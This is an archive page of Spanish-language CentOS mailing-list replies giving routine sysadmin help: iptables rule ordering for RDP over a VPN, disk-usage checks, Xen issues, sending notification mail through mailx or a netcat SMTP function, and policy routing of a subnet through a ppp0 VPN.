Re: [CentOS-es] Firewall en VPN
Hola César, Para poder ver qué otras reglas hay en el firewall, pero sobretodo, en qué orden envía la salida del comando iptables -L -n Entiendo que las reglas que pones están en un firewall en la oficina A ¿No hay firewall en la oficina B? El 27/10/14 a las 22:21, César Martinez escribió: Saludos amigos acudo a ustedes haber quien me puede echar una mano, tengo un servidor Linux centos 5.11 el cuál hace proxy y firewall, existe una VPN que tiene montada el proveedor de internet con dos routers entre dos ciudades, le pedí al proveedor que todo el tráfico que genera el tunel se envie a mi servidor de tal forma que yo controlo todos los accesos del tunel de los usuarios, el segmento que maneja la red en al oficina A es 192.168.0.X y en la oficina B es 192.168.1.X, necesito que desde la oficina en la red 192.168.1.X pueda abrir el escritorio remoto de un servidor con windows via terminal server por el puerto 3389, para ello he creado estas reglas $IPTABLES -I FORWARD -d 192.168.1.0/24 -i $INTERNALIF -j ACCEPT $IPTABLES -A OUTPUT -d 192.168.1.0/24 -j ACCEPT $IPTABLES -A OUTPUT -p tcp -d 192.168.1.0/24 -j ACCEPT $IPTABLES -I FORWARD -d 192.168.1.0/24 -i $INTERNALIF -p tcp --dport 3389 -j ACCEPT Además abrí el puerto 3389 así $IPTABLES -A INPUT -p tcp --dport 3389 -j ACCEPT No logro hacer que desde la red local del otro segmento se abra la terminal tengo ping desde el segmento 192.168.1 .X al 192.168.0.X para probar si es mi firewall le bajo momentaneamente y sin problemas se abre el terminal desde la red B hacia la A Agradezco a las personas que me puedan guiar que me hace falta para que puedan usar el terminal sin problemas -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Firewall en VPN
0.0.0.0/0 Esta regla permite todos los protocoles desde cualquier origen a cualquier destino pero no es efectiva por que las cadenas FACEBOOK y FACEBOOK1 están antes que ella. REJECT tcp -- 0.0.0.0/00.0.0.0/0 tcp dpt:137 reject-with icmp-port-unreachable No hace nada ya que la relga anterior permite todo. REJECT tcp -- 0.0.0.0/00.0.0.0/0 tcp dpt:138 reject-with icmp-port-unreachable No hace nada ya que otra regla anterior ya lo permite todo. REJECT tcp -- 0.0.0.0/00.0.0.0/0 tcp dpt:139 reject-with icmp-port-unreachable REJECT udp -- 0.0.0.0/00.0.0.0/0 udp dpt:137 reject-with icmp-port-unreachable REJECT udp -- 0.0.0.0/00.0.0.0/0 udp dpt:138 reject-with icmp-port-unreachable REJECT udp -- 0.0.0.0/00.0.0.0/0 udp dpt:139 reject-with icmp-port-unreachable Estas reglas no tienen efecto ya que otra regla anterior ya lo permite todo. ACCEPT all -- 0.0.0.0/00.0.0.0/0 Repetida ACCEPT all -- 0.0.0.0/00.0.0.0/0 state NEW ACCEPT all -- 0.0.0.0/00.0.0.0/0 state RELATED,ESTABLISHED Esta regla debería ser la segunda de la cadena FORWARD ACCEPT tcp -- 0.0.0.0/0192.168.0.3 tcp dpt:3389 LOGtcp -- 0.0.0.0/00.0.0.0/0 tcp flags:0x17/0x02 limit: avg 5/min burst 5 LOG flags 0 level 4 prefix `Firewalled packet:' REJECT tcp -- 0.0.0.0/00.0.0.0/0 reject-with tcp-reset DROP all -- 0.0.0.0/00.0.0.0/0 Chain OUTPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- 0.0.0.0/0192.168.1.0/24 Esta regla permite cualquier protocolo desde cualquier IP con destino 192.168.1.0 ACCEPT tcp -- 0.0.0.0/0192.168.1.0/24 Esta no hace nada ya que la anterior la incluye ACCEPT all -- 0.0.0.0/00.0.0.0/0 state NEW Se aceptan todos los procotolos con cualquier origen, hacia cualquier destino con conexiones que originen una primera conexión ACCEPT all -- 0.0.0.0/00.0.0.0/0 Se aceptan todos los protocolos con cualquier origen, hacia cualquier destino para conexiones nuevas, ya establicidas o relacionadas con otras Chain FACEBOOK (31 references) target prot opt source destination ACCEPT all -- 192.168.0.10 0.0.0.0/0 ACCEPT all -- 192.168.0.1030.0.0.0/0 ACCEPT all -- 192.168.0.1220.0.0.0/0 ACCEPT all -- 192.168.0.1400.0.0.0/0 ACCEPT all -- 192.168.0.1420.0.0.0/0 ACCEPT all -- 192.168.0.1540.0.0.0/0 ACCEPT all -- 192.168.0.1700.0.0.0/0 ACCEPT all -- 192.168.0.28 0.0.0.0/0 ACCEPT all -- 192.168.0.3 0.0.0.0/0 ACCEPT all -- 192.168.0.30 0.0.0.0/0 ACCEPT all -- 192.168.0.52 0.0.0.0/0 ACCEPT all -- 192.168.0.61 0.0.0.0/0 ACCEPT all -- 192.168.0.63 0.0.0.0/0 ACCEPT all -- 192.168.0.64 0.0.0.0/0 ACCEPT all -- 192.168.0.67 0.0.0.0/0 ACCEPT all -- 192.168.0.69 0.0.0.0/0 ACCEPT all -- 192.168.0.7 0.0.0.0/0 ACCEPT all -- 192.168.0.8 0.0.0.0/0 ACCEPT all -- 192.168.0.83 0.0.0.0/0 ACCEPT all -- 192.168.1.0 0.0.0.0/0 ACCEPT all -- 192.168.1.1500.0.0.0/0 ACCEPT all -- 192.168.1.7 0.0.0.0/0 DROP all -- 0.0.0.0/00.0.0.0/0 Chain FACEBOOK1 (20 references) target prot opt source destination ACCEPT all -- 192.168.0.10 0.0.0.0/0 ACCEPT all -- 192.168.0.1030.0.0.0/0 ACCEPT all -- 192.168.0.1220.0.0.0/0 ACCEPT all -- 192.168.0.1400.0.0.0/0 ACCEPT all -- 192.168.0.1420.0.0.0/0 ACCEPT all -- 192.168.0.1540.0.0.0/0 ACCEPT all -- 192.168.0.1700.0.0.0/0 ACCEPT all -- 192.168.0.28 0.0.0.0/0 ACCEPT all -- 192.168.0.3 0.0.0.0/0 ACCEPT all -- 192.168.0.30 0.0.0.0/0 ACCEPT all -- 192.168.0.52 0.0.0.0/0 ACCEPT all -- 192.168.0.61 0.0.0.0/0 ACCEPT all -- 192.168.0.63 0.0.0.0/0 ACCEPT all -- 192.168.0.64 0.0.0.0/0 ACCEPT all -- 192.168.0.67 0.0.0.0/0 ACCEPT all -- 192.168.0.69 0.0.0.0/0 ACCEPT all -- 192.168.0.7 0.0.0.0/0 ACCEPT all -- 192.168.0.8 0.0.0.0/0 ACCEPT all -- 192.168.0.83 0.0.0.0/0 ACCEPT all -- 192.168.1.0 0.0.0.0/0 ACCEPT all -- 192.168.1.1500.0.0.0/0 ACCEPT all -- 192.168.1.7 0.0.0.0/0 DROP all -- 0.0.0.0/00.0.0.0/0 -- Francesc Guitart ___ CentOS-es mailing list CentOS-es
Re: [CentOS-es] Limpieza de temporales y cosas inecesarias
El 19/06/2014 17:30, Maxi escribió: Tengo un vps con centos con 10gb supuestos de disco a lo que cada semana viene colapsando porque se queda sin espacio en disco, lo unico que puedo borrar a ciencia cierta es el backup automatico que hacen que ocupa 3gb. Imagino que debe haber mas cosas por eliminar para reducir espacio, pero no se que ni como, y el servicio tecnico se desentiende de estas tareas. Me dan una mano? Para ver cuanto ocupa cada directorio en la raiz: sudo du -sh /* Y después repite la operación en los más voluminosos para entrar en detalle. Por ejemplo: sudo du -sh /var/* Así verás si hay algún directorio que ocupa más de la cuenta y donde puedes realmente ganar espacio. Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Centos 6 x64 Xen no puedo correr mis maquinas virtuales.
El 16/06/2014 18:20, Periko Support escribió: Hola gente. Miren, ando triste, me llego mi servidor nuevo un supermicro SuperServer 1027R-WRF4+, el plan es correr varios servicios virtualizados con Xen ya que le tenemos mucha confianza a ambos, ya tenemos otros servidores con Xen sobre Centos 5.x sin problemas. Ahora con el soporte que tiene centos 6 con mayor razon deseamos movernos ahi, pero estos ultimos dias he tenido problemas delicados. Despues de haber hecho la instalacion de centos 6x64, segui con la parte de instalar Xen y sus utilerias, les quiero recordar que yo en lo personal no tengo en mi servidores nada relacionado el modo grafico, todo es en consola. Ya Xen corriendo, segui creando mis MV's(Maquinas Virtuales), la 1ra Centos 6.5, ya hecha la instalacion, al momento de prenderla y conectarme a la consola me sale este mensaje y ahi se queda colgada: xm console oerp-server PCI: Fatal: No config space access function found ipmi_si: Could not set up I/O space ipmi_si: Could not set up I/O space ipmi_si: Could not set up I/O space Relacionado con ipmi del servidor, el cual lo tiene habilitado de fabrica en el BIOS? No se aun, bueno de ahi me fui a probar con centos 5.9x64, ya instalado a ejecutarlo, este sale con otro error: Brought up 1 CPUs [...] Asi como que no encuentra el disco, algo totalmente distinto a dom-u para centos 6. Algo que me llama la atencion es que en la version 6.5 sin xen usan el kernel 2.6.x, pero con Xen usan el 3.x. Tal como comenta Ernesto, Red Hat 6 no soporta Xen: http://wiki.centos.org/QaWiki/Xen4 Esto me pasa con mi servidor nuevo como con mi viejo lobo de un Dell PowerEdge 2950. Alguien mas con ese problema? Aquí un HowTo bien explicadito. Prueba a ver que tal: http://www.howtoforge.com/virtualization-with-xen-on-centos-6.2-x86_64-paravirtualization-and-hardware-virtualization Saludos. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Configuración Mail
El 16/06/2014 19:23, jorge saul sanchez molina escribió: Buen Dia Lista Solicito de su apoyo, me están solicitando configurar mi servidor centos que envié notificaciones por correo al servidor de correo de la empresa, tengo la duda si es necesario instalar el postfix y el bind, o si solo con el comando mail es suficiente Me pudieran guiar en la configuración del servidor Solo con el comando mail o mailx es suficiente: man mail Tambien puedes hacerlo atacando directamente al puerto 25 (con telnet o netcat) en un script. Yo uso esta función en mis scripts: function send_mail () { subject=$1 sender=sen...@tudominio.com rcpt=recipi...@tudominio.com domaine=$(dnsdomainname) ehlo=${HOSTNAME}.${domaine} mailserver=smtp.tudominio.com { echo EHLO $ehlo sleep 1 echo MAIL FROM:${sender} sleep 1 echo RCPT TO:${rcpt} sleep 1 echo 'DATA' sleep 1 echo Subject: $subject echo -e To:${rcpt}\n cat /ruta/al/fichero/que/quieres/enviar echo Escribe aquí lo que quieres enviar echo '.' } | nc $mailserver 25 } send_mail Asunto del mensaje -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Configuración Mail
El 17/06/2014 17:12, Periko Support escribió: 2014-06-17 6:59 GMT-07:00 Francesc Guitart fguit...@gmx.com: El 16/06/2014 19:23, jorge saul sanchez molina escribió: Buen Dia Lista Solicito de su apoyo, me están solicitando configurar mi servidor centos que envié notificaciones por correo al servidor de correo de la empresa, tengo la duda si es necesario instalar el postfix y el bind, o si solo con el comando mail es suficiente Me pudieran guiar en la configuración del servidor Solo con el comando mail o mailx es suficiente: man mail Tambien puedes hacerlo atacando directamente al puerto 25 (con telnet o netcat) en un script. Yo uso esta función en mis scripts: function send_mail () { subject=$1 sender=sen...@tudominio.com rcpt=recipi...@tudominio.com domaine=$(dnsdomainname) ehlo=${HOSTNAME}.${domaine} mailserver=smtp.tudominio.com { echo EHLO $ehlo sleep 1 echo MAIL FROM:${sender} sleep 1 echo RCPT TO:${rcpt} sleep 1 echo 'DATA' sleep 1 echo Subject: $subject echo -e To:${rcpt}\n cat /ruta/al/fichero/que/quieres/enviar echo Escribe aquí lo que quieres enviar echo '.' } | nc $mailserver 25 } send_mail Asunto del mensaje -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es Hola. Se me hace mas complejo, trata ssmtp Francesc, solo configuras el archivo de configuracion de ssmtp, remplazas el mail command interno y listo, no hay necesidad de tener que poner un script como ese que de verlo me da miedo. Es una función. Una vez la has creado solo tienes que copiar/pegar de script a script. A veces prefiero pasar un rato largo haciendo algo a priori más complejo pero sin usar utilidades extras. Aunque esto sería otra discusión, a mi esto me parece más simple. Y el servidor todos mensajes los arrojara solito a tu bandeja, claro una vez configurado: root=r...@mydominio.com mailhub=mail.midominio.com RewriteDomain=midominio.com Hostname=mbx-paloma FromLineOverride=YES Simples parametros para apuntar a mi servidor de correo, remplazas el mail interno y listo a probar y recibir los correos a la bandeja. Por trucos no paramos, un saludos amigos!!! Exacto! De eso se trata :) -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Problemas con Rutas
El 29/05/2014 21:27, James Dean escribió: ufff... hice todo y no pude ingresar al cliente 192.168.4.2 para poder hacer las pruebas... luego aplique 'ip rule del from 192.168.4.0/28 table vpn' y posteriormente 'ip rule add from 192.168.4.2 table vpn' y pude acceder al cliente. ¿Desde donde accedes a radxa? Si accedes desde la red 192.168.7.X es normal que te suceda con las reglas que habíamos aplicado. Todo el trafico saliente de la red 192.168.4.0 es enviado a la gateway X.Y.Z.W. Si quieres que estas dos redes se comuniquen añade una regla que lo permita en la tabla vpn. Sería algo como: ip route add 192.168.7.0/24 via 192.168.7.1 dev eth0 table vpn desde radxa no pude acceder a internet, al ejecutar en radxa 'lynx www.google.com' se queda pegado... y en el server centos se ve : tcpdump -i eth4 not port 22 15:23:39.372159 IP 192.168.4.2.44039 192.168.4.1.domain: 49003+ A? www.google.com. (32) 15:23:39.372189 IP 192.168.4.2.44039 192.168.4.1.domain: 48077+ ? www.google.com. (32) 15:23:39.398117 IP 192.168.4.1.domain 192.168.4.2.44039: 49003 5/0/0 A 173.194.42.211, A 173.194.42.210, A 173.194.42.208, A 173.194.42.209, A 173.194.42.212 (112) 15:23:39.398172 IP 192.168.4.1.domain 192.168.4.2.44039: 48077 1/0/0 2800:3f0:4003:800::1012 (60) 15:23:39.426042 IP 192.168.4.2.60032 192.168.4.1.domain: 51490+ A? www.google.com. (32) 15:23:39.426064 IP 192.168.4.2.60032 192.168.4.1.domain: 55927+ ? www.google.com. (32) 15:23:39.426157 IP 192.168.4.1.domain 192.168.4.2.60032: 51490 5/0/0 A 173.194.42.212, A 173.194.42.209, A 173.194.42.208, A 173.194.42.210, A 173.194.42.211 (112) 15:23:39.426221 IP 192.168.4.1.domain 192.168.4.2.60032: 55927 1/0/0 2800:3f0:4003:800::1012 (60) 15:23:39.429146 IP 192.168.4.2.45624 192.168.4.1.domain: 46806+ A? www.google.com. (32) 15:23:39.429177 IP 192.168.4.2.45624 192.168.4.1.domain: 41269+ ? www.google.com. (32) 15:23:39.429237 IP 192.168.4.1.domain 192.168.4.2.45624: 46806 5/0/0 A 173.194.42.211, A 173.194.42.212, A 173.194.42.209, A 173.194.42.208, A 173.194.42.210 (112) 15:23:39.429278 IP 192.168.4.1.domain 192.168.4.2.45624: 41269 1/0/0 2800:3f0:4003:800::1012 (60) 15:23:39.430923 IP 192.168.4.2.56098 scl03s05-in-f19.1e100.net.http: Flags [S], seq 3747597655, win 14600, options [mss 1460,sackOK,TS val 2788592 ecr 0,nop,wscale 4], length 0 15:23:42.433559 IP 192.168.4.2.56098 scl03s05-in-f19.1e100.net.http: Flags [S], seq 3747597655, win 14600, options [mss 1460,sackOK,TS val 2788893 ecr 0,nop,wscale 4], length 0 15:23:48.443398 IP 192.168.4.2.56098 scl03s05-in-f19.1e100.net.http: Flags [S], seq 3747597655, win 14600, options [mss 1460,sackOK,TS val 2789494 ecr 0,nop,wscale 4], length 0 Seguiré revisando ... Parece claro que los paquetes no pasan del servidor. Manda la salida de ip addr, ip route show, ip route show table vpn y ip rule show. En cuanto a la gateway X.Y.Z.W, y teniendo en cuenta que dijiste que no sabes la IP del otro extremo de la VPN hasta que te conectas, usa la IP de la interfaz ppp0. Gracias !!! De nada. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Problemas con Rutas
El 30/05/2014 15:49, James Dean escribió: 2014-05-30 4:46 GMT-04:00 Francesc Guitart fguit...@gmx.com: El 29/05/2014 21:27, James Dean escribió: ufff... hice todo y no pude ingresar al cliente 192.168.4.2 para poder hacer las pruebas... luego aplique 'ip rule del from 192.168.4.0/28 table vpn' y posteriormente 'ip rule add from 192.168.4.2 table vpn' y pude acceder al cliente. ¿Desde donde accedes a radxa? Si accedes desde la red 192.168.7.X es normal que te suceda con las reglas que habíamos aplicado. Todo el trafico saliente de la red 192.168.4.0 es enviado a la gateway X.Y.Z.W. Si quieres que estas dos redes se comuniquen añade una regla que lo permita en la tabla vpn. Sería algo como: Al radxa accedo desde la red 192.168.7.X ip route add 192.168.7.0/24 via 192.168.7.1 dev eth0 table vpn Ok, sin embargo ahora únicamente el cliente radxa (192.168.4.2) es el que esta en la ruta vpn, y puedo acceder a el desde 192.168.7.X sin problemas ni con la necesidad de agregar ninguna ruta adicional... Raro. Creo que podrías tener ese comportamiento si haces NAT de salida en la eth4 del server (192.168.4.1). Si no sabría decirte. Habría que investigar más. Olvidé pedirte también la salida de ip route show table local desde radxa no pude acceder a internet, al ejecutar en radxa 'lynx www.google.com' se queda pegado... y en el server centos se ve : tcpdump -i eth4 not port 22 15:23:39.372159 IP 192.168.4.2.44039 192.168.4.1.domain: 49003+ A? www.google.com. (32) 15:23:39.372189 IP 192.168.4.2.44039 192.168.4.1.domain: 48077+ ? www.google.com. (32) 15:23:39.398117 IP 192.168.4.1.domain 192.168.4.2.44039: 49003 5/0/0 A 173.194.42.211, A 173.194.42.210, A 173.194.42.208, A 173.194.42.209, A 173.194.42.212 (112) 15:23:39.398172 IP 192.168.4.1.domain 192.168.4.2.44039: 48077 1/0/0 2800:3f0:4003:800::1012 (60) 15:23:39.426042 IP 192.168.4.2.60032 192.168.4.1.domain: 51490+ A? www.google.com. (32) 15:23:39.426064 IP 192.168.4.2.60032 192.168.4.1.domain: 55927+ ? www.google.com. (32) 15:23:39.426157 IP 192.168.4.1.domain 192.168.4.2.60032: 51490 5/0/0 A 173.194.42.212, A 173.194.42.209, A 173.194.42.208, A 173.194.42.210, A 173.194.42.211 (112) 15:23:39.426221 IP 192.168.4.1.domain 192.168.4.2.60032: 55927 1/0/0 2800:3f0:4003:800::1012 (60) 15:23:39.429146 IP 192.168.4.2.45624 192.168.4.1.domain: 46806+ A? www.google.com. (32) 15:23:39.429177 IP 192.168.4.2.45624 192.168.4.1.domain: 41269+ ? www.google.com. (32) 15:23:39.429237 IP 192.168.4.1.domain 192.168.4.2.45624: 46806 5/0/0 A 173.194.42.211, A 173.194.42.212, A 173.194.42.209, A 173.194.42.208, A 173.194.42.210 (112) 15:23:39.429278 IP 192.168.4.1.domain 192.168.4.2.45624: 41269 1/0/0 2800:3f0:4003:800::1012 (60) 15:23:39.430923 IP 192.168.4.2.56098 scl03s05-in-f19.1e100.net.http: Flags [S], seq 3747597655, win 14600, options [mss 1460,sackOK,TS val 2788592 ecr 0,nop,wscale 4], length 0 15:23:42.433559 IP 192.168.4.2.56098 scl03s05-in-f19.1e100.net.http: Flags [S], seq 3747597655, win 14600, options [mss 1460,sackOK,TS val 2788893 ecr 0,nop,wscale 4], length 0 15:23:48.443398 IP 192.168.4.2.56098 scl03s05-in-f19.1e100.net.http: Flags [S], seq 3747597655, win 14600, options [mss 1460,sackOK,TS val 2789494 ecr 0,nop,wscale 4], length 0 Seguiré revisando ... Parece claro que los paquetes no pasan del servidor. Manda la salida de ip addr, ip route show, ip route show table vpn y ip rule show. ip addr : 1: lo: LOOPBACK,UP,LOWER_UP mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 6: eth4: BROADCAST,MULTICAST,UP,LOWER_UP mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether brd ff:ff:ff:ff:ff:ff inet 192.168.4.1/28 brd 192.168.4.15 scope global eth4 inet6 fe80::6ef0:49ff:fe0f:b795/64 scope link valid_lft forever preferred_lft forever 7: eth5: BROADCAST,MULTICAST,UP,LOWER_UP mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether brd ff:ff:ff:ff:ff:ff inet 192.168.7.1/28 brd 192.168.7.15 scope global eth5 inet6 fe80::208:54ff:fe36:c9f9/64 scope link valid_lft forever preferred_lft forever 9: eth7: BROADCAST,MULTICAST,UP,LOWER_UP mtu 1444 qdisc pfifo_fast state UNKNOWN qlen 1000 link/ether brd ff:ff:ff:ff:ff:ff inet 192.168.0.12/24 brd 192.168.0.255 scope global eth7 inet6 fe80::200:24ff:fec9:ceda/64 scope link valid_lft forever preferred_lft forever 24: ppp0: POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP mtu 1396 qdisc pfifo_fast state UNKNOWN qlen 3 link/ppp inet 192.161.173.24 peer 192.161.173.3/32 scope global ppp0 ip route show: 192.161.173.3 dev ppp0 proto kernel scope link src 192.161.173.24 192.161.173.2 via 192.168.0.1 dev eth7 src 192.168.0.12 192.168.7.0/28 dev eth5
Re: [CentOS-es] Problemas con Rutas
El 30/05/2014 17:38, James Dean escribió: 2014-05-30 11:34 GMT-04:00 Francesc Guitart fguit...@gmx.com: El 30/05/2014 15:49, James Dean escribió: 2014-05-30 4:46 GMT-04:00 Francesc Guitart fguit...@gmx.com: El 29/05/2014 21:27, James Dean escribió: ufff... hice todo y no pude ingresar al cliente 192.168.4.2 para poder hacer las pruebas... luego aplique 'ip rule del from 192.168.4.0/28 table vpn' y posteriormente 'ip rule add from 192.168.4.2 table vpn' y pude acceder al cliente. ¿Desde donde accedes a radxa? Si accedes desde la red 192.168.7.X es normal que te suceda con las reglas que habíamos aplicado. Todo el trafico saliente de la red 192.168.4.0 es enviado a la gateway X.Y.Z.W. Si quieres que estas dos redes se comuniquen añade una regla que lo permita en la tabla vpn. Sería algo como: Al radxa accedo desde la red 192.168.7.X ip route add 192.168.7.0/24 via 192.168.7.1 dev eth0 table vpn Ok, sin embargo ahora únicamente el cliente radxa (192.168.4.2) es el que esta en la ruta vpn, y puedo acceder a el desde 192.168.7.X sin problemas ni con la necesidad de agregar ninguna ruta adicional... Raro. Creo que podrías tener ese comportamiento si haces NAT de salida en la eth4 del server (192.168.4.1). Si no sabría decirte. Habría que investigar más. Olvidé pedirte también la salida de ip route show table local aquí esta : broadcast 192.168.7.0 dev eth5 proto kernel scope link src 192.168.7.1 local 192.161.173.24 dev ppp0 proto kernel scope host src 192.161.173.24 broadcast 192.168.0.255 dev eth7 proto kernel scope link src 192.168.0.12 local 192.168.7.1 dev eth5 proto kernel scope host src 192.168.7.1 broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1 local 192.168.0.12 dev eth7 proto kernel scope host src 192.168.0.12 broadcast 192.168.4.15 dev eth4 proto kernel scope link src 192.168.4.1 broadcast 192.168.4.0 dev eth4 proto kernel scope link src 192.168.4.1 local 192.168.4.1 dev eth4 proto kernel scope host src 192.168.4.1 broadcast 192.168.0.0 dev eth7 proto kernel scope link src 192.168.0.12 broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1 broadcast 192.168.7.15 dev eth5 proto kernel scope link src 192.168.7.1 local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1 local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1 Gracias !!! Pues las tablas parecen estar bien. ¿Como tienes iptables configurado? Pasa la salida de iptables -L -n -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Problemas con Rutas
El 30/05/2014 18:48, Francesc Guitart escribió: El 30/05/2014 17:38, James Dean escribió: 2014-05-30 11:34 GMT-04:00 Francesc Guitart fguit...@gmx.com: El 30/05/2014 15:49, James Dean escribió: 2014-05-30 4:46 GMT-04:00 Francesc Guitart fguit...@gmx.com: El 29/05/2014 21:27, James Dean escribió: ufff... hice todo y no pude ingresar al cliente 192.168.4.2 para poder hacer las pruebas... luego aplique 'ip rule del from 192.168.4.0/28 table vpn' y posteriormente 'ip rule add from 192.168.4.2 table vpn' y pude acceder al cliente. ¿Desde donde accedes a radxa? Si accedes desde la red 192.168.7.X es normal que te suceda con las reglas que habíamos aplicado. Todo el trafico saliente de la red 192.168.4.0 es enviado a la gateway X.Y.Z.W. Si quieres que estas dos redes se comuniquen añade una regla que lo permita en la tabla vpn. Sería algo como: Al radxa accedo desde la red 192.168.7.X ip route add 192.168.7.0/24 via 192.168.7.1 dev eth0 table vpn Ok, sin embargo ahora únicamente el cliente radxa (192.168.4.2) es el que esta en la ruta vpn, y puedo acceder a el desde 192.168.7.X sin problemas ni con la necesidad de agregar ninguna ruta adicional... Raro. Creo que podrías tener ese comportamiento si haces NAT de salida en la eth4 del server (192.168.4.1). Si no sabría decirte. Habría que investigar más. Olvidé pedirte también la salida de ip route show table local aquí esta : broadcast 192.168.7.0 dev eth5 proto kernel scope link src 192.168.7.1 local 192.161.173.24 dev ppp0 proto kernel scope host src 192.161.173.24 broadcast 192.168.0.255 dev eth7 proto kernel scope link src 192.168.0.12 local 192.168.7.1 dev eth5 proto kernel scope host src 192.168.7.1 broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1 local 192.168.0.12 dev eth7 proto kernel scope host src 192.168.0.12 broadcast 192.168.4.15 dev eth4 proto kernel scope link src 192.168.4.1 broadcast 192.168.4.0 dev eth4 proto kernel scope link src 192.168.4.1 local 192.168.4.1 dev eth4 proto kernel scope host src 192.168.4.1 broadcast 192.168.0.0 dev eth7 proto kernel scope link src 192.168.0.12 broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1 broadcast 192.168.7.15 dev eth5 proto kernel scope link src 192.168.7.1 local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1 local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1 Gracias !!! Pues las tablas parecen estar bien. ¿Como tienes iptables configurado? Pasa la salida de iptables -L -n Otra sugerencia: usa ip route get para debugar que ruta toman los paquetes. ip route get to 8.8.8.8 from 192.168.4.2 iif eth4 ip route get to ip_destino from ip_origen iif eth_donde_se_recibe_la_petición -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Problemas con Rutas
El 28/05/2014 17:22, James Dean escribió: Amigos... les cuento... tengo un centos con internet vía eth0 el cual hace NAT sin problemas.. pero necesito que un cliente de mi lan (192.168.7.11) salga por una VPN (ppp0) ... entonces aplique : (en el Server) - echo 10 vpn /etc/iproute2/rt_tables - ip rule add from 192.168.7.11 table vpn - ip route add default via X.Y.Z.W dev ppp0 table vpn - ip route flush cache y el cliente tiene acceso a la Lan pero no a Internet... Cuando dices que el 192.168.7.11 tiene acceso a la LAN, ¿te refieres al otro extremo de la VPN? Alguien me podría dar una mano para ver por donde esta el problema ?? Más preguntas para entender tu entorno. ¿Quién levanta la VPN el servidor o PC con la 192.168.7.11? He supuesto que el servidor. ¿Por donde quieres que 192.168.7.11 salga a Internet? ¿Por tu gateway o por el gateway del otro extremo de la VPN? Con las lineas ip rule y ip route add default estas forzando que el 192.162.7.11 salga siempre, absolutamente siempre, por la VPN. Así que: 1. Asegúrate que la VPN está levantada y tienes acceso al otro extremo desde el servidor. 2. Si quieres que el 192.168.7.11 salga a Internet a través de la red que hay en el otro extremo de la VPN, comprueba que la gateway por defecto que has añadido (X.Y.Z.W) puede salir a Internet. Si no puede salir añádele las rutas pertinentes. Si sí puede seguramente deberás activar en enrutado en X.Y.Z.W Muchas Gracias a todos... Bueno hay muchas alternativas y muchas posibles causas dependiendo de lo que estés intentando, así que mejor que antes lo aclares un poco más. Saludos, -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Problemas con Rutas
El 29/05/2014 17:55, James Dean escribió: Francesc : Gracias por tu respuesta, te respondo... el cliente 192.168.7.11 (radxa) tiene acceso a la red Local (192.168.7.0), pero no al otro extremo de la VPN El responsable de levantar la VPN es el Server Centos Mi intención es que radxa salga a internet por la VPN (ppp0) [es decir, salir por el Gateway del otro extremo de la VPN] NEW!!! Acabo de reconfigurar todo el escenario... he creado en eth4 la subnet 192.168.4.1/28. - Tengo configurado dhcpd, dns y firewall - radxa (que esta dentro de esta nueva subnet tiene la IP 192.168.4.2) sale a internet (no por la VPN) y red local sin problemas... - Problema : Lo que necesito, con este nuevo escenario, es que todos los clientes de la subnet 192.168.4.1/28 (con Gateway 192.168.7.1 en eth4) salgan a internet por la VPN (ppp0) que levanta Centos.- Los PCs de la red 192.168.4.1/28 deben usar como gateway la 192.168.4.1 Mas Datos: - radxa levanta bien el cliente e incluso puedo navegar por internet y el `curl ifconfig.me me` devuelve la IP entregada por la VPN.- ¿Radxa levanta bien el cliente? ¿No habías dicho que el encargado de levantar la VPN era el servidor? Ahora voy a crear la ruta, regla y hacer las pruebas (todo en centos)... creo que mi problema esta por el lado del nat e iptables... la verdad es que esta es la primera vez que veo estos temas en centos... pero esta interesante (todo sea por el Amazon Fire TV :) Tienes que crear una ruta que diga que todo lo que viene de la red 192.168.4.0/28 sea reenviado a través de la VPN. Adapta las rutas y las reglas que habías creado anteriormente No me lo he mirado mucho pero según lo que habías propuesto anteriormente sería algo como: (en el Server) - echo 10 vpn /etc/iproute2/rt_tables - ip rule add from 192.168.4.0/28 table vpn - ip route add default via X.Y.Z.W dev ppp0 table vpn - ip route flush cache X.Y.Z.W debería ser la IP del interface ppp0 o quizás la del terminador la VPN (el otro extremo de VPN) Usa tracepath o traceroute para verificar que ruta toman los paquetes. Gracias !!! De nada! -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Integracion Postfix dovecot con Active directory
